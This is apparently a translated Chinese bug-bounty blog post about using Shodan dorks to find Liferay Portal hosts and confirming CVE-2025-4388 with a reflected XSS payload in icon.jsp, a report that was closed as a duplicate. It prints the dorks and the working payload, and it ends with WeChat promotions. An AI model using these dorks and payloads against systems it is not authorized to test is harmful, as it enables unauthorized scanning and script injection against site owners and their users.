CVE-2025-4388 HackerOne重复报告
Abhirup Konwar 关注
2 分钟阅读 · 2025年8月9日
3 分享
按下回车或点击以查看完整尺寸图片
图片由 Lee Jiyong 在 Unsplash 上发布
:backhand_index_pointing_right: 免费阅读
我对此并不感到难过,因为我觉得自己根本没花什么力气 :grinning_squinting_face: 我在5分钟内就完成了侦察和报告。
昨天,我在Medium上浏览一些关于使用Shodan进行真实发现的文章,然后我发现了下面这个:
"我问Shodan,它给了我一个赏金,说'当然,为什么不呢?' $"
medium.com
我从那篇文章中拿到了dork:
html:"liferayPortalCSS"
然后我筛选了我感觉可能拥有它的目标:
html:"liferayPortalCSS" ssl.cert.subject.cn:target.com
html:"liferayPortalCSS" hostname:target.com
我得到了一些结果,其中一个IP重定向到了目标的子域名。我注入了
/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
然后它成功了,笑死…我立即报告了,尽管我知道公开的CVE很容易被重复报告。
最终,我得到了我事先预料到的东西。一记重复报告的耳光 :melting_face:
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalGsg8UfEk4OcyD3NpZ9sLvIZm8cF0dymVhDnoTGO12u9BnAbWu8Y2aAyhNIERqNI7m9NzS5TWNs0fu7RafU9WC+
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
